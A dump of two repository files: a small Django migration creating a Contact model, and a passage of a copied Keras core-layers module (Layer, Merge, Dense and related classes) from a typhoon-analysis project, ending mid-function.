22e4593e3b8168d3afcc0f6a85b63881afc24dc1 | f0f42828e8458246e2c492849ad6623b89a590cc | /home/migrations/0001_initial.py | 65c98fe2ad6de87a30d97d25215e50bff1b92faf | [] | no_license | prashantmore20/mmyk-blog | c8f775c472914566a648bef757b5adeae2661cf1 | fc76ca79bcb29a3534b6f1b286c072a33500233a | refs/heads/main | 2023-03-01T05:51:27.164011 | 2021-02-13T16:07:39 | 2021-02-13T16:07:39 | 326,447,703 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | # Generated by Django 3.0 on 2020-12-27 14:20
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Contact',
fields=[
('sno', models.AutoField(primary_key=True, serialize=False)),
('fname', models.CharField(max_length=300)),
('lname', models.CharField(max_length=300)),
],
),
]
| [
"prashant.more20@gmail.com"
] | prashant.more20@gmail.com |
8d7a88b96271237b2da557618c38b7480a979454 | 4e2fdafb5231e65d90d1400dd29580477a1a8fad | /typhoon_scipts/lstm_1.0/recurrent_convolutional_core.py | 8b1b1e723ea94c3409331303a945c1537e2daf6a | [] | no_license | DanlanChen/typhoon_analysis_nii | 6e5c9c556a0b501485f7221eb6ff2891b398f012 | 1f6ad00db6cdabac25e2ff6c56fa553dea710538 | refs/heads/master | 2021-05-04T06:58:20.485310 | 2017-11-10T17:33:49 | 2017-11-10T17:33:49 | 70,544,309 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 76,981 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
import numpy as np
from collections import OrderedDict
import copy
from six.moves import zip
from keras import backend as K
from keras import activations, initializations, regularizers, constraints
from keras.regularizers import ActivityRegularizer
import marshal
import types
import sys
class Layer(object):
'''Abstract base layer class.
All Keras layers accept certain keyword arguments:
trainable: boolean. Set to "False" before model compilation
to freeze layer weights (they won't be updated further
during training).
input_shape: a tuple of integers specifying the expected shape
of the input samples. Does not includes the batch size.
(e.g. `(100,)` for 100-dimensional inputs).
batch_input_shape: a tuple of integers specifying the expected
shape of a batch of input samples. Includes the batch size
(e.g. `(32, 100)` for a batch of 32 100-dimensional inputs).
'''
def __init__(self, **kwargs):
if not hasattr(self, 'trainable_weights'):
self.trainable_weights = []
if not hasattr(self, 'non_trainable_weights'):
self.non_trainable_weights = []
allowed_kwargs = {'input_shape',
'trainable',
'batch_input_shape',
'cache_enabled',
'name'}
for kwarg in kwargs:
assert kwarg in allowed_kwargs, 'Keyword argument not understood: ' + kwarg
if 'batch_input_shape' in kwargs:
self.set_input_shape(tuple(kwargs['batch_input_shape']))
elif 'input_shape' in kwargs:
self.set_input_shape((None,) + tuple(kwargs['input_shape']))
self.trainable = True
if 'trainable' in kwargs:
self.trainable = kwargs['trainable']
self.name = self.__class__.__name__.lower()
if 'name' in kwargs:
self.name = kwargs['name']
self.cache_enabled = True
if 'cache_enabled' in kwargs:
self.cache_enabled = kwargs['cache_enabled']
@property
def name(self):
return self._name
@name.setter
def name(self, name):
self._name = name
@property
def cache_enabled(self):
return self._cache_enabled
@cache_enabled.setter
def cache_enabled(self, value):
self._cache_enabled = value
def __call__(self, X, mask=None, train=False):
# turn off layer cache temporarily
tmp_cache_enabled = self.cache_enabled
self.cache_enabled = False
# create a temporary layer
layer = Layer(batch_input_shape=self.input_shape)
layer.name = "dummy"
layer.input = X
if hasattr(self, 'get_input_mask'):
layer.get_input_mask = lambda _: mask
# set temporary previous
tmp_previous = None
if hasattr(self, 'previous'):
tmp_previous = self.previous
self.set_previous(layer, False)
Y = self.get_output(train=train)
# return previous to what it was
if tmp_previous is not None:
self.set_previous(tmp_previous, False)
else:
self.clear_previous(False)
self.cache_enabled = tmp_cache_enabled
return Y
def set_previous(self, layer, reset_weights=True):
'''Connect a layer to its parent in the computational graph.
'''
assert self.nb_input == layer.nb_output == 1, 'Cannot connect layers: input count and output count should be 1.'
if hasattr(self, 'input_ndim'):
assert self.input_ndim == len(layer.output_shape), ('Incompatible shapes: layer expected input with ndim=' +
str(self.input_ndim) +
' but previous layer has output_shape ' +
str(layer.output_shape))
if layer.get_output_mask() is not None:
assert self.supports_masked_input(), 'Cannot connect non-masking layer to layer with masked output.'
if not reset_weights:
assert layer.output_shape == self.input_shape, ('Cannot connect layers without resetting weights: ' +
'expected input with shape ' +
str(self.input_shape) +
' but previous layer has output_shape ' +
str(layer.output_shape))
self.previous = layer
if reset_weights:
self.build()
def clear_previous(self, reset_weights=True):
'''Unlink a layer from its parent in the computational graph.
This is only allowed if the layer has an `input` attribute.
'''
if not hasattr(self, 'input'):
raise Exception('Cannot clear previous for non-input layers')
if hasattr(self, 'previous'):
del self.previous
if reset_weights:
self.build()
def build(self):
'''Instantiation of layer weights.
Called after `set_previous`, or after `set_input_shape`,
once the layer has a defined input shape.
Must be implemented on all layers that have weights.
'''
pass
@property
def trainable(self):
if hasattr(self, '_trainable'):
return self._trainable
else:
return True
@trainable.setter
def trainable(self, value):
self._trainable = value
@property
def nb_input(self):
return 1
@property
def nb_output(self):
return 1
@property
def input_shape(self):
# if layer is not connected (e.g. input layer),
# input shape can be set manually via _input_shape attribute.
if hasattr(self, 'previous'):
if hasattr(self, 'shape_cache') and self.cache_enabled:
previous_layer_id = id(self.previous)
if previous_layer_id in self.shape_cache:
return self.shape_cache[previous_layer_id]
previous_size = self.previous.output_shape
if hasattr(self, 'shape_cache') and self.cache_enabled:
previous_layer_id = id(self.previous)
self.shape_cache[previous_layer_id] = previous_size
return previous_size
elif hasattr(self, '_input_shape'):
return self._input_shape
else:
raise Exception('Layer is not connected. Did you forget to set "input_shape"?')
def set_input_shape(self, input_shape):
if type(input_shape) not in [tuple, list]:
raise Exception('Invalid input shape - input_shape should be a tuple of int.')
input_shape = tuple(input_shape)
if hasattr(self, 'input_ndim') and self.input_ndim:
if self.input_ndim != len(input_shape):
raise Exception('Invalid input shape - Layer expects input ndim=' +
str(self.input_ndim) +
', was provided with input shape ' + str(input_shape))
self._input_shape = input_shape
self.input = K.placeholder(shape=self._input_shape)
self.build()
@property
def output_shape(self):
# default assumption: tensor shape unchanged.
return self.input_shape
def get_output(self, train=False):
return self.get_input(train)
def get_input(self, train=False):
if hasattr(self, 'previous'):
# to avoid redundant computations,
# layer outputs are cached when possible.
if hasattr(self, 'layer_cache') and self.cache_enabled:
previous_layer_id = '%s_%s' % (id(self.previous), train)
if previous_layer_id in self.layer_cache:
return self.layer_cache[previous_layer_id]
previous_output = self.previous.get_output(train=train)
if hasattr(self, 'layer_cache') and self.cache_enabled:
previous_layer_id = '%s_%s' % (id(self.previous), train)
self.layer_cache[previous_layer_id] = previous_output
return previous_output
elif hasattr(self, 'input'):
return self.input
else:
raise Exception('Layer is not connected' +
' and is not an input layer.')
def supports_masked_input(self):
'''Whether or not this layer respects the output mask of its previous
layer in its calculations.
If you try to attach a layer that does *not* support masked_input to
a layer that gives a non-None output_mask(), an error will be raised.
'''
return False
def get_output_mask(self, train=None):
'''For some models (such as RNNs) you want a way of being able to mark
some output data-points as "masked",
so they are not used in future calculations.
In such a model, get_output_mask() should return a mask
of one less dimension than get_output()
(so if get_output is (nb_samples, nb_timesteps, nb_dimensions),
then the mask is (nb_samples, nb_timesteps),
with a one for every unmasked datapoint,
and a zero for every masked one.
If there is *no* masking then it shall return None.
For instance if you attach an Activation layer (they support masking)
to a layer with an output_mask, then that Activation shall
also have an output_mask.
If you attach it to a layer with no such mask,
then the Activation's get_output_mask shall return None.
Some layers have an output_mask even if their input is unmasked,
notably Embedding which can turn the entry "0" into
a mask.
'''
return None
def set_weights(self, weights):
'''Set the weights of the layer.
weights: a list of numpy arrays. The number
of arrays and their shape must match
number of the dimensions of the weights
of the layer (i.e. it should match the
output of `get_weights`).
'''
params = self.trainable_weights + self.non_trainable_weights
assert len(params) == len(weights), ('Provided weight array does not match layer weights (' +
str(len(params)) + ' layer params vs. ' +
str(len(weights)) + ' provided weights)')
for p, w in zip(params, weights):
if K.get_value(p).shape != w.shape:
raise Exception('Layer weight shape %s not compatible with provided weight shape %s.' % (K.get_value(p).shape, w.shape))
K.set_value(p, w)
def get_weights(self):
'''Return the weights of the layer,
as a list of numpy arrays.
'''
params = self.trainable_weights + self.non_trainable_weights
weights = []
for p in params:
weights.append(K.get_value(p))
return weights
def get_config(self):
'''Return the parameters of the layer, as a dictionary.
'''
config = {'name': self.__class__.__name__}
if hasattr(self, '_input_shape'):
input_shape = self._input_shape
if input_shape[0]:
config['batch_input_shape'] = input_shape[:]
else:
config['input_shape'] = input_shape[1:]
if hasattr(self, '_trainable'):
config['trainable'] = self._trainable
config['cache_enabled'] = self.cache_enabled
config['custom_name'] = self.name
return config
def get_params(self):
consts = []
updates = []
if hasattr(self, 'regularizers'):
regularizers = self.regularizers
else:
regularizers = []
if hasattr(self, 'constraints') and len(self.constraints) == len(self.trainable_weights):
for c in self.constraints:
if c:
consts.append(c)
else:
consts.append(constraints.identity())
elif hasattr(self, 'constraint') and self.constraint:
consts += [self.constraint for _ in range(len(self.trainable_weights))]
else:
consts += [constraints.identity() for _ in range(len(self.trainable_weights))]
if hasattr(self, 'updates') and self.updates:
updates += self.updates
return self.trainable_weights, regularizers, consts, updates
def count_params(self):
'''Return the total number of floats (or ints)
composing the weights of the layer.
'''
return sum([K.count_params(p) for p in self.trainable_weights])
class MaskedLayer(Layer):
'''If your layer trivially supports masking
(by simply copying the input mask to the output),
then subclass MaskedLayer instead of Layer,
and make sure that you incorporate the input mask
into your calculation of get_output().
'''
def supports_masked_input(self):
return True
def get_input_mask(self, train=False):
if hasattr(self, 'previous'):
return self.previous.get_output_mask(train)
else:
return None
def get_output_mask(self, train=False):
''' The default output mask is just the input mask unchanged.
Override this in your own implementations if,
for instance, you are reshaping the input'''
return self.get_input_mask(train)
class Masking(MaskedLayer):
'''Mask an input sequence by using a mask value to identify padding.
This layer copies the input to the output layer with identified padding
replaced with 0s and creates an output mask in the process.
At each timestep, if the values all equal `mask_value`,
then the corresponding mask value for the timestep is 0 (skipped),
otherwise it is 1.
'''
def __init__(self, mask_value=0., **kwargs):
super(Masking, self).__init__(**kwargs)
self.mask_value = mask_value
if (not hasattr(self, 'input')):
self.input = K.placeholder(ndim=3)
def get_output_mask(self, train=False):
X = self.get_input(train)
return K.any(K.not_equal(X, self.mask_value), axis=-1)
def get_output(self, train=False):
X = self.get_input(train)
return X * K.cast(K.any(K.not_equal(X, self.mask_value), axis=-1, keepdims=True), K.floatx())
def get_config(self):
config = {'name': self.__class__.__name__,
'mask_value': self.mask_value}
base_config = super(Masking, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Merge(Layer):
'''Merge the output of a list of layers or containers into a single tensor.
# Arguments
mode: one of {sum, mul, concat, ave, join, cos, dot}.
sum: sum the outputs (shapes must match)
mul: multiply the outputs element-wise (shapes must match)
concat: concatenate the outputs along the axis specified by `concat_axis`
ave: average the outputs (shapes must match)
join: places the outputs in an OrderedDict (inputs must be named)
concat_axis: axis to use in `concat` mode.
dot_axes: axis or axes to use in `dot` mode
(see [the Numpy documentation](http://docs.scipy.org/doc/numpy-1.10.1/reference/generated/numpy.tensordot.html) for more details).
# TensorFlow warning
`dot` mode only works with Theano for the time being.
# Examples
```python
left = Sequential()
left.add(Dense(50, input_shape=(784,)))
left.add(Activation('relu'))
right = Sequential()
right.add(Dense(50, input_shape=(784,)))
right.add(Activation('relu'))
model = Sequential()
model.add(Merge([left, right], mode='sum'))
model.add(Dense(10))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
model.fit([X_train, X_train], Y_train, batch_size=128, nb_epoch=20,
validation_data=([X_test, X_test], Y_test))
```
'''
def __init__(self, layers, mode='sum', concat_axis=-1, dot_axes=-1):
if len(layers) < 2:
raise Exception('Please specify two or more input layers '
'(or containers) to merge')
if mode not in {'sum', 'mul', 'concat', 'ave', 'join', 'cos', 'dot'}:
raise Exception('Invalid merge mode: ' + str(mode))
if mode in {'sum', 'mul', 'ave', 'cos'}:
input_shapes = set([l.output_shape for l in layers])
if len(input_shapes) > 1:
raise Exception('Only layers of same output shape can '
'be merged using ' + mode + ' mode. ' +
'Layer shapes: %s' % ([l.output_shape for l in layers]))
if mode in {'cos', 'dot'}:
if K._BACKEND != 'theano':
raise Exception('"' + mode + '" merge mode will only work with Theano.')
if len(layers) > 2:
raise Exception(mode + ' merge takes exactly 2 layers')
shape1 = layers[0].output_shape
shape2 = layers[1].output_shape
n1 = len(shape1)
n2 = len(shape2)
if mode == 'dot':
if type(dot_axes) == int:
if dot_axes < 0:
dot_axes = [range(dot_axes % n1, n1), range(dot_axes % n2, n2)]
else:
dot_axes = [range(n1 - dot_axes, n2), range(1, dot_axes + 1)]
if type(dot_axes) not in [list, tuple]:
raise Exception('Invalid type for dot_axes - should be a list.')
if len(dot_axes) != 2:
raise Exception('Invalid format for dot_axes - should contain two elements.')
if type(dot_axes[0]) not in [list, tuple, range] or type(dot_axes[1]) not in [list, tuple, range]:
raise Exception('Invalid format for dot_axes - list elements should have type "list" or "tuple".')
for i in range(len(dot_axes[0])):
if shape1[dot_axes[0][i]] != shape2[dot_axes[1][i]]:
raise Exception('Dimension incompatibility using dot mode: ' +
'%s != %s. ' % (shape1[dot_axes[0][i]], shape2[dot_axes[1][i]]) +
'Layer shapes: %s, %s' % (shape1, shape2))
elif mode == 'concat':
input_shapes = set()
for l in layers:
oshape = list(l.output_shape)
oshape.pop(concat_axis)
oshape = tuple(oshape)
input_shapes.add(oshape)
if len(input_shapes) > 1:
raise Exception('"concat" mode can only merge layers with matching ' +
'output shapes except for the concat axis. ' +
'Layer shapes: %s' % ([l.output_shape for l in layers]))
self.mode = mode
self.concat_axis = concat_axis
self.dot_axes = dot_axes
self.layers = layers
self.trainable_weights = []
self.regularizers = []
self.constraints = []
self.updates = []
for l in self.layers:
params, regs, consts, updates = l.get_params()
self.regularizers += regs
self.updates += updates
# params and constraints have the same size
for p, c in zip(params, consts):
if p not in self.trainable_weights:
self.trainable_weights.append(p)
self.constraints.append(c)
super(Merge, self).__init__()
@property
def output_shape(self):
input_shapes = [layer.output_shape for layer in self.layers]
if self.mode in ['sum', 'mul', 'ave']:
return input_shapes[0]
elif self.mode == 'concat':
output_shape = list(input_shapes[0])
for shape in input_shapes[1:]:
output_shape[self.concat_axis] += shape[self.concat_axis]
return tuple(output_shape)
elif self.mode == 'join':
return None
elif self.mode == 'dot':
shape1 = list(input_shapes[0])
shape2 = list(input_shapes[1])
dot_axes = []
for axes in self.dot_axes:
dot_axes.append([index-1 for index in axes])
tensordot_output = np.tensordot(np.zeros(tuple(shape1[1:])),
np.zeros(tuple(shape2[1:])),
axes=dot_axes)
if len(tensordot_output.shape) == 0:
shape = (1,)
else:
shape = tensordot_output.shape
return (shape1[0],) + shape
elif self.mode == 'cos':
return (input_shapes[0][0], 1)
def get_params(self):
return self.trainable_weights, self.regularizers, self.constraints, self.updates
def get_output(self, train=False):
if self.mode == 'sum' or self.mode == 'ave':
s = self.layers[0].get_output(train)
for i in range(1, len(self.layers)):
s += self.layers[i].get_output(train)
if self.mode == 'ave':
s /= len(self.layers)
return s
elif self.mode == 'concat':
inputs = [self.layers[i].get_output(train) for i in range(len(self.layers))]
return K.concatenate(inputs, axis=self.concat_axis)
elif self.mode == 'join':
inputs = OrderedDict()
for i in range(len(self.layers)):
X = self.layers[i].get_output(train)
name = getattr(self.layers[i], 'name', None)
if name is None:
raise ValueError('merge_mode="join" only works with named inputs.')
else:
inputs[name] = X
return inputs
elif self.mode == 'mul':
s = self.layers[0].get_output(train)
for i in range(1, len(self.layers)):
s *= self.layers[i].get_output(train)
return s
elif self.mode == 'dot':
if K._BACKEND != 'theano':
raise Exception('"dot" merge mode will only work with Theano.')
from theano import tensor as T
l1 = self.layers[0].get_output(train)
l2 = self.layers[1].get_output(train)
output = T.batched_tensordot(l1, l2, self.dot_axes)
output_shape = list(self.output_shape)
output_shape[0] = l1.shape[0]
output = output.reshape(tuple(output_shape))
return output
elif self.mode == 'cos':
if K._BACKEND != 'theano':
raise Exception('"cos" merge mode will only work with Theano.')
from theano import tensor as T
l1 = self.layers[0].get_output(train)
l2 = self.layers[1].get_output(train)
output = T.batched_tensordot(l1, l2, self.dot_axes) / T.sqrt(T.batched_tensordot(l1, l1, self.dot_axes) * T.batched_tensordot(l2, l2, self.dot_axes))
output = output.dimshuffle((0, 'x'))
return output
else:
raise Exception('Unknown merge mode.')
def get_input(self, train=False):
res = []
for i in range(len(self.layers)):
o = self.layers[i].get_input(train)
if not type(o) == list:
o = [o]
for output in o:
if output not in res:
res.append(output)
return res
@property
def input(self):
return self.get_input()
def supports_masked_input(self):
return False
def get_output_mask(self, train=None):
return None
def get_weights(self):
weights = []
for l in self.layers:
weights += l.get_weights()
return weights
def set_weights(self, weights):
for i in range(len(self.layers)):
nb_param = len(self.layers[i].trainable_weights)
self.layers[i].set_weights(weights[:nb_param])
weights = weights[nb_param:]
def get_config(self):
config = {'name': self.__class__.__name__,
'layers': [l.get_config() for l in self.layers],
'mode': self.mode,
'concat_axis': self.concat_axis,
'dot_axes': self.dot_axes}
base_config = super(Merge, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class TimeDistributedMerge(Layer):
'''Sum/multiply/average over the outputs of a TimeDistributed layer.
# Input shape
3D tensor with shape: `(samples, steps, features)`.
# Output shape
2D tensor with shape: `(samples, features)`.
# Arguments
mode: one of {'sum', 'mul', 'ave'}
'''
input_ndim = 3
def __init__(self, mode='sum', **kwargs):
super(TimeDistributedMerge, self).__init__(**kwargs)
self.mode = mode
self.trainable_weights = []
self.regularizers = []
self.constraints = []
self.updates = []
@property
def output_shape(self):
return (None, self.input_shape[2])
def get_output(self, train=False):
X = self.get_input(train)
if self.mode == 'ave':
s = K.mean(X, axis=1)
return s
if self.mode == 'sum':
s = K.sum(X, axis=1)
return s
elif self.mode == 'mul':
s = K.prod(X, axis=1)
return s
else:
raise Exception('Unknown merge mode')
def get_config(self):
config = {'name': self.__class__.__name__,
'mode': self.mode}
base_config = super(TimeDistributedMerge, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Dropout(MaskedLayer):
'''Apply Dropout to the input. Dropout consists in randomly setting
a fraction `p` of input units to 0 at each update during training time,
which helps prevent overfitting.
# Arguments
p: float between 0 and 1. Fraction of the input units to drop.
# References
- [Dropout: A Simple Way to Prevent Neural Networks from Overfitting](http://www.cs.toronto.edu/~rsalakhu/papers/srivastava14a.pdf)
'''
def __init__(self, p, **kwargs):
super(Dropout, self).__init__(**kwargs)
self.p = p
def get_output(self, train=False):
X = self.get_input(train)
if self.p > 0.:
if train:
X = K.dropout(X, level=self.p)
return X
def get_config(self):
config = {'name': self.__class__.__name__,
'p': self.p}
base_config = super(Dropout, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Activation(MaskedLayer):
'''Apply an activation function to an output.
# Input shape
Arbitrary. Use the keyword argument `input_shape`
(tuple of integers, does not include the samples axis)
when using this layer as the first layer in a model.
# Output shape
Same shape as input.
# Arguments:
activation: name of activation function to use
(see: [activations](../activations.md)),
or alternatively, a Theano or TensorFlow operation.
'''
def __init__(self, activation, **kwargs):
super(Activation, self).__init__(**kwargs)
self.activation = activations.get(activation)
def get_output(self, train=False):
X = self.get_input(train)
return self.activation(X)
def get_config(self):
config = {'name': self.__class__.__name__,
'activation': self.activation.__name__}
base_config = super(Activation, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Reshape(Layer):
'''Reshape an output to a certain shape.
# Input shape
Arbitrary, although all dimensions in the input shaped must be fixed.
Use the keyword argument `input_shape`
(tuple of integers, does not include the samples axis)
when using this layer as the first layer in a model.
# Output shape
`(batch_size,) + dims`
# Arguments
dims: target shape. Tuple of integers,
does not include the samples dimension (batch size).
'''
def __init__(self, dims, **kwargs):
super(Reshape, self).__init__(**kwargs)
self.dims = tuple(dims)
def _fix_unknown_dimension(self, input_shape, output_shape):
'''Find and replace a single missing dimension in an output shape
given and input shape.
A near direct port of the internal numpy function _fix_unknown_dimension
in numpy/core/src/multiarray/shape.c
# Arguments
input_shape: shape of array being reshaped
output_shape: desired shaped of the array with at most
a single -1 which indicates a dimension that should be
derived from the input shape.
# Returns
The new output shape with a -1 replaced with its computed value.
Raises a ValueError if the total array size of the output_shape is
different then the input_shape, or more then one unknown dimension
is specified.
'''
output_shape = list(output_shape)
msg = 'total size of new array must be unchanged'
known, unknown = 1, None
for index, dim in enumerate(output_shape):
if dim < 0:
if unknown is None:
unknown = index
else:
raise ValueError('can only specify one unknown dimension')
else:
known *= dim
original = np.prod(input_shape, dtype=int)
if unknown is not None:
if known == 0 or original % known != 0:
raise ValueError(msg)
output_shape[unknown] = original // known
elif original != known:
raise ValueError(msg)
return tuple(output_shape)
@property
def output_shape(self):
return (self.input_shape[0],) + self._fix_unknown_dimension(self.input_shape[1:], self.dims)
def get_output(self, train=False):
X = self.get_input(train)
return K.reshape(X, (-1,) + self.output_shape[1:])
def get_config(self):
config = {'name': self.__class__.__name__,
'dims': self.dims}
base_config = super(Reshape, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Permute(Layer):
'''Permute the dimensions of the input according to a given pattern.
Useful for e.g. connecting RNNs and convnets together.
# Input shape
Arbitrary. Use the keyword argument `input_shape`
(tuple of integers, does not include the samples axis)
when using this layer as the first layer in a model.
# Output shape
Same as the input shape, but with the dimensions re-ordered according
to the specified pattern.
# Arguments
dims: Tuple of integers. Permutation pattern, does not include the
samples dimension. Indexing starts at 1.
For instance, `(2, 1)` permutes the first and second dimension
of the input.
'''
def __init__(self, dims, **kwargs):
super(Permute, self).__init__(**kwargs)
self.dims = tuple(dims)
@property
def output_shape(self):
input_shape = list(self.input_shape)
output_shape = copy.copy(input_shape)
for i, dim in enumerate(self.dims):
target_dim = input_shape[dim]
output_shape[i+1] = target_dim
return tuple(output_shape)
def get_output(self, train=False):
X = self.get_input(train)
return K.permute_dimensions(X, (0,) + self.dims)
def get_config(self):
config = {'name': self.__class__.__name__,
'dims': self.dims}
base_config = super(Permute, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Flatten(Layer):
'''Flatten the input. Does not affect the batch size.
# Input shape
Arbitrary, although all dimensions in the input shape must be fixed.
Use the keyword argument `input_shape`
(tuple of integers, does not include the samples axis)
when using this layer as the first layer in a model.
# Output shape
`(batch_size,)`
'''
def __init__(self, **kwargs):
super(Flatten, self).__init__(**kwargs)
@property
def output_shape(self):
input_shape = self.input_shape
if not all(input_shape[1:]):
raise Exception('The shape of the input to "Flatten" '
'is not fully defined '
'(got ' + str(input_shape[1:]) + '. '
'Make sure to pass a complete "input_shape" '
'or "batch_input_shape" argument to the first '
'layer in your model.')
return (input_shape[0], np.prod(input_shape[1:]))
def get_output(self, train=False):
X = self.get_input(train)
return K.batch_flatten(X)
class RepeatVector(Layer):
'''Repeat the input n times.
# Input shape
2D tensor of shape `(nb_samples, features)`.
# Output shape
3D tensor of shape `(nb_samples, n, features)`.
# Arguments
n: integer, repetition factor.
'''
def __init__(self, n, **kwargs):
super(RepeatVector, self).__init__(**kwargs)
self.n = n
@property
def output_shape(self):
input_shape = self.input_shape
return (input_shape[0], self.n, input_shape[1])
def get_output(self, train=False):
X = self.get_input(train)
return K.repeat(X, self.n)
def get_config(self):
config = {'name': self.__class__.__name__,
'n': self.n}
base_config = super(RepeatVector, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Dense(Layer):
'''Just your regular fully connected NN layer.
# Input shape
2D tensor with shape: `(nb_samples, input_dim)`.
# Output shape
2D tensor with shape: `(nb_samples, output_dim)`.
# Arguments
output_dim: int > 0.
init: name of initialization function for the weights of the layer
(see [initializations](../initializations.md)),
or alternatively, Theano function to use for weights
initialization. This parameter is only relevant
if you don't pass a `weights` argument.
activation: name of activation function to use
(see [activations](../activations.md)),
or alternatively, elementwise Theano function.
If you don't specify anything, no activation is applied
(ie. "linear" activation: a(x) = x).
weights: list of numpy arrays to set as initial weights.
The list should have 1 element, of shape `(input_dim, output_dim)`.
W_regularizer: instance of [WeightRegularizer](../regularizers.md)
(eg. L1 or L2 regularization), applied to the main weights matrix.
b_regularizer: instance of [WeightRegularizer](../regularizers.md),
applied to the bias.
activity_regularizer: instance of [ActivityRegularizer](../regularizers.md),
applied to the network output.
W_constraint: instance of the [constraints](../constraints.md) module
(eg. maxnorm, nonneg), applied to the main weights matrix.
b_constraint: instance of the [constraints](../constraints.md) module,
applied to the bias.
input_dim: dimensionality of the input (integer).
This argument (or alternatively, the keyword argument `input_shape`)
is required when using this layer as the first layer in a model.
'''
input_ndim = 2
def __init__(self, output_dim, init='glorot_uniform', activation='linear', weights=None,
W_regularizer=None, b_regularizer=None, activity_regularizer=None,
W_constraint=None, b_constraint=None, input_dim=None, **kwargs):
self.init = initializations.get(init)
self.activation = activations.get(activation)
self.output_dim = output_dim
self.W_regularizer = regularizers.get(W_regularizer)
self.b_regularizer = regularizers.get(b_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.W_constraint = constraints.get(W_constraint)
self.b_constraint = constraints.get(b_constraint)
self.constraints = [self.W_constraint, self.b_constraint]
self.initial_weights = weights
self.input_dim = input_dim
if self.input_dim:
kwargs['input_shape'] = (self.input_dim,)
self.input = K.placeholder(ndim=2)
super(Dense, self).__init__(**kwargs)
def build(self):
input_dim = self.input_shape[1]
self.W = self.init((input_dim, self.output_dim))
self.b = K.zeros((self.output_dim,))
self.trainable_weights = [self.W, self.b]
self.regularizers = []
if self.W_regularizer:
self.W_regularizer.set_param(self.W)
self.regularizers.append(self.W_regularizer)
if self.b_regularizer:
self.b_regularizer.set_param(self.b)
self.regularizers.append(self.b_regularizer)
if self.activity_regularizer:
self.activity_regularizer.set_layer(self)
self.regularizers.append(self.activity_regularizer)
if self.initial_weights is not None:
self.set_weights(self.initial_weights)
del self.initial_weights
@property
def output_shape(self):
return (self.input_shape[0], self.output_dim)
def get_output(self, train=False):
X = self.get_input(train)
output = self.activation(K.dot(X, self.W) + self.b)
return output
def get_config(self):
config = {'name': self.__class__.__name__,
'output_dim': self.output_dim,
'init': self.init.__name__,
'activation': self.activation.__name__,
'W_regularizer': self.W_regularizer.get_config() if self.W_regularizer else None,
'b_regularizer': self.b_regularizer.get_config() if self.b_regularizer else None,
'activity_regularizer': self.activity_regularizer.get_config() if self.activity_regularizer else None,
'W_constraint': self.W_constraint.get_config() if self.W_constraint else None,
'b_constraint': self.b_constraint.get_config() if self.b_constraint else None,
'input_dim': self.input_dim}
base_config = super(Dense, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class TimeDistributedDense(MaskedLayer):
'''Apply a same Dense layer for each dimension[1] (time_dimension) input.
Especially useful after a recurrent network with 'return_sequence=True'.
# Input shape
3D tensor with shape `(nb_sample, time_dimension, input_dim)`.
# Output shape
3D tensor with shape `(nb_sample, time_dimension, output_dim)`.
# Arguments
output_dim: int > 0.
init: name of initialization function for the weights of the layer
(see [initializations](../initializations.md)),
or alternatively, Theano function to use for weights
initialization. This parameter is only relevant
if you don't pass a `weights` argument.
activation: name of activation function to use
(see [activations](../activations.md)),
or alternatively, elementwise Theano function.
If you don't specify anything, no activation is applied
(ie. "linear" activation: a(x) = x).
weights: list of numpy arrays to set as initial weights.
The list should have 1 element, of shape `(input_dim, output_dim)`.
W_regularizer: instance of [WeightRegularizer](../regularizers.md)
(eg. L1 or L2 regularization), applied to the main weights matrix.
b_regularizer: instance of [WeightRegularizer](../regularizers.md),
applied to the bias.
activity_regularizer: instance of [ActivityRegularizer](../regularizers.md),
applied to the network output.
W_constraint: instance of the [constraints](../constraints.md) module
(eg. maxnorm, nonneg), applied to the main weights matrix.
b_constraint: instance of the [constraints](../constraints.md) module,
applied to the bias.
input_dim: dimensionality of the input (integer).
This argument (or alternatively, the keyword argument `input_shape`)
is required when using this layer as the first layer in a model.
'''
input_ndim = 3
def __init__(self, output_dim,
init='glorot_uniform', activation='linear', weights=None,
W_regularizer=None, b_regularizer=None, activity_regularizer=None,
W_constraint=None, b_constraint=None,
input_dim=None, input_length=None, **kwargs):
self.output_dim = output_dim
self.init = initializations.get(init)
self.activation = activations.get(activation)
self.W_regularizer = regularizers.get(W_regularizer)
self.b_regularizer = regularizers.get(b_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.W_constraint = constraints.get(W_constraint)
self.b_constraint = constraints.get(b_constraint)
self.constraints = [self.W_constraint, self.b_constraint]
self.initial_weights = weights
self.input_dim = input_dim
self.input_length = input_length
if self.input_dim:
kwargs['input_shape'] = (self.input_length, self.input_dim)
self.input = K.placeholder(ndim=3)
super(TimeDistributedDense, self).__init__(**kwargs)
def build(self):
input_dim = self.input_shape[2]
self.W = self.init((input_dim, self.output_dim))
self.b = K.zeros((self.output_dim,))
self.trainable_weights = [self.W, self.b]
self.regularizers = []
if self.W_regularizer:
self.W_regularizer.set_param(self.W)
self.regularizers.append(self.W_regularizer)
if self.b_regularizer:
self.b_regularizer.set_param(self.b)
self.regularizers.append(self.b_regularizer)
if self.activity_regularizer:
self.activity_regularizer.set_layer(self)
self.regularizers.append(self.activity_regularizer)
if self.initial_weights is not None:
self.set_weights(self.initial_weights)
del self.initial_weights
@property
def output_shape(self):
input_shape = self.input_shape
return (input_shape[0], input_shape[1], self.output_dim)
def get_output(self, train=False):
X = self.get_input(train)
def step(x, states):
output = K.dot(x, self.W) + self.b
return output, []
last_output, outputs, states = K.rnn(step, X,
initial_states=[],
mask=None)
outputs = self.activation(outputs)
return outputs
def get_config(self):
config = {'name': self.__class__.__name__,
'output_dim': self.output_dim,
'init': self.init.__name__,
'activation': self.activation.__name__,
'W_regularizer': self.W_regularizer.get_config() if self.W_regularizer else None,
